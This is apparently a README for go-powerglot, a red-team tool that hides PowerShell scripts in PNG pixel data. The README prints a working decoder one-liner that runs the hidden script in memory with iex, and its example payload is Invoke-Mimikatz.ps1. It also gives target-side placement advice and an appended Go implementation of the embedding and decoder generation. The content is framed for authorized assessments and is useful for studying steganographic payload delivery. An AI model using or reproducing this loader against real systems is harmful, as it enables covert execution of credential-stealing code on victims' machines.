# go-powerglot

`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It turns an ordinary PNG file into a covert script carrier and prints a PowerShell one-liner that extracts the script from the image and executes it in memory. Inspired by [Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage).

> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests.

## Features

- **Steganography**: Embeds the script bytes into image pixels, one byte per pixel, by rewriting the low four bits of the red and green channels.
- **PowerShell Payload Generator**: Automatically generates a one-liner that reads the pixels back, decodes the script and executes it straight from the PNG image.
- **Portable**: Single binary with no external dependencies beyond Go's standard library.
- **File Size & Dimension Checks**: Verifies that the image has enough pixels (width × height) to hold every byte of the script before embedding.

## Installation

### Prerequisites

- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.
### Steps

- Clone the repository:

  ```
  $ git clone https://cgit.heqnx.com/go-powerglot
  $ cd go-powerglot
  ```

- Install dependencies:

  ```
  $ go mod tidy
  ```

- Build for all platforms:

  ```
  $ make all
  ```

- Binaries are written to the `build/` directory for Linux, Windows and macOS. Alternatively, build for a single platform:

  ```
  $ make linux-amd64
  $ make windows-amd64
  $ make darwin-arm64
  ```

- (Optional) Run directly with Go, passing the same flags as the built binary:

  ```
  $ go run main.go -exec -image -out -script
  ```

## Usage

### Command-Line Flags

```
Usage of ./go-powerglot:
  -exec string
        execution path to be used inside the generated PowerShell one-liner
  -image string
        input PNG file to embed the script into
  -out string
        output PNG file with embedded script
  -script string
        PowerShell script file to embed
```

## Examples

### Embed a PowerShell script into a PNG and generate a decoder

Quote the Windows path given to `-exec` so the shell does not strip its backslashes:

```
$ ./go-powerglot \
    -image img/windows-11-5689x2400.png \
    -script Invoke-Mimikatz.ps1 \
    -out test.png \
    -exec 'C:\Users\Public\test.png'
```

- Example output:

  ```
  [inf] script size: 3625037 bytes
  [inf] image size: 2702073 bytes
  [inf] png dimensions: 5689x2400
  [inf] created output file: /home/heqnx/go-powerglot/test.png
  [inf] successfully embedded Invoke-Mimikatz.ps1 into test.png
  [inf] powershell decoder snippet:
  sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036]))
  ```

- The capacity check is on pixel count, not file size: 5689 × 2400 = 13,653,600 pixels carry one byte each, which is why the decoder allocates a 13653600-byte buffer and then keeps only the first 3625037 bytes (`$o[0..3625036]`). The 2702073-byte figure is the compressed size of the input PNG and has nothing to do with how much the image can hold.

- To use the generated snippet, place the output PNG at the path given with `-exec` on the target (here `C:\Users\Public\test.png`) and run the one-liner there. It loads the image with `System.Drawing`, walks every pixel row by row, rebuilds each script byte from the low four bits of the red channel (high nibble) and the green channel (low nibble), and executes the reconstructed script in memory with `iex`.

- Points to keep in mind:
  - `-exec` is the path where the image will live on the target, not the local `-out` path.
  - The carrier must reach the target byte-for-byte. Any re-encoding, resizing or conversion to a lossy format such as JPEG destroys the low bits and with them the script.
  - The decoder depends on the `System.Drawing` assembly, so it is meant for PowerShell hosts on Windows.
  - `GetPixel` is called once per pixel; decoding the 5689×2400 example above means about 13.6 million calls, so large carriers take noticeably longer to decode than to embed.

## Disclaimer

`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details.
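The pixel layout that the decoder one-liner in the Examples section reverses, as an added Go example that is not part of the go-powerglot code base: `embedNibbles` writes one script byte per pixel (high nibble into the low four bits of red, low nibble into the low four bits of green, row-major from the top left), `extractNibbles` reads the bytes back in the same order, `decoderSnippet` reproduces the shape of the printed one-liner from the same parameters, and `roundTrip` pushes a constructed carrier and a short constructed script through Go's PNG encoder and decoder to show that the bits survive a lossless save. The function names, the synthetic gradient carrier and the test script are assumptions of this example; go-powerglot's own source may be structured differently.

```go
package main

import (
	"bytes"
	"fmt"
	"image"
	"image/color"
	"image/png"
)

// embedNibbles writes one payload byte per pixel, row-major from the top-left:
// the high nibble replaces the low 4 bits of R, the low nibble the low 4 bits of G.
// This is the layout the README's PowerShell decoder undoes with
// ($p.r -band 0x0f)*16 + ($p.g -band 0x0f).
func embedNibbles(src image.Image, payload []byte) (*image.NRGBA, error) {
	b := src.Bounds()
	w, h := b.Dx(), b.Dy()
	if len(payload) > w*h {
		return nil, fmt.Errorf("payload is %d bytes but a %dx%d image holds at most %d", len(payload), w, h, w*h)
	}
	// NRGBA stores non-premultiplied channels, so the low nibbles are written
	// to the file exactly as set here.
	out := image.NewNRGBA(image.Rect(0, 0, w, h))
	i := 0
	for y := 0; y < h; y++ {
		for x := 0; x < w; x++ {
			c := color.NRGBAModel.Convert(src.At(b.Min.X+x, b.Min.Y+y)).(color.NRGBA)
			if i < len(payload) {
				c.R = c.R&0xf0 | payload[i]>>4
				c.G = c.G&0xf0 | payload[i]&0x0f
				i++
			}
			out.SetNRGBA(x, y, c)
		}
	}
	return out, nil
}

// extractNibbles reads n bytes back in the same pixel order.
func extractNibbles(img image.Image, n int) ([]byte, error) {
	b := img.Bounds()
	w, h := b.Dx(), b.Dy()
	if n > w*h {
		return nil, fmt.Errorf("asked for %d bytes but the image has only %d pixels", n, w*h)
	}
	out := make([]byte, 0, n)
	for y := 0; y < h && len(out) < n; y++ {
		for x := 0; x < w && len(out) < n; x++ {
			c := color.NRGBAModel.Convert(img.At(b.Min.X+x, b.Min.Y+y)).(color.NRGBA)
			out = append(out, (c.R&0x0f)<<4|c.G&0x0f)
		}
	}
	return out, nil
}

// decoderSnippet reproduces the shape of the README's one-liner for a carrier
// at path with the given dimensions and an n-byte script (assumed layout).
func decoderSnippet(path string, w, h, n int) string {
	return fmt.Sprintf(`sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("%s");$o=a byte[] %d;(0..%d)|%%{foreach($x in 0..%d) {$p=$g.getpixel($x,$_);$o[$_*%d+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..%d]))`,
		path, w*h, h-1, w-1, w, n-1)
}

// roundTrip embeds payload into a constructed w x h gradient carrier, runs the
// result through the PNG encoder and decoder, and returns what extraction recovers.
func roundTrip(w, h int, payload []byte) ([]byte, error) {
	carrier := image.NewNRGBA(image.Rect(0, 0, w, h))
	for y := 0; y < h; y++ {
		for x := 0; x < w; x++ {
			carrier.SetNRGBA(x, y, color.NRGBA{R: uint8(x * 37), G: uint8(y * 53), B: 0x80, A: 0xff})
		}
	}
	stego, err := embedNibbles(carrier, payload)
	if err != nil {
		return nil, err
	}
	var buf bytes.Buffer
	if err := png.Encode(&buf, stego); err != nil {
		return nil, err
	}
	decoded, err := png.Decode(&buf)
	if err != nil {
		return nil, err
	}
	return extractNibbles(decoded, len(payload))
}

func main() {
	script := []byte("Write-Host 'hello from a png'") // constructed 29-byte script
	got, err := roundTrip(8, 4, script)               // 32 pixels: enough
	fmt.Printf("recovered %q, err=%v\n", got, err)
	fmt.Println(decoderSnippet(`C:\Users\Public\test.png`, 8, 4, len(script)))
	_, err = roundTrip(4, 4, script) // 16 pixels: capacity check must refuse
	fmt.Println("capacity check:", err)
}
```

Run it with `go run`: the first line prints the script recovered from the decoded PNG, the second the one-liner shaped like the README's for an 8×4 carrier, and the third the error from the capacity check. The layout is only as robust as the carrier's transport: because the script lives in the two least significant nibbles, a single lossy re-encode scrambles every byte.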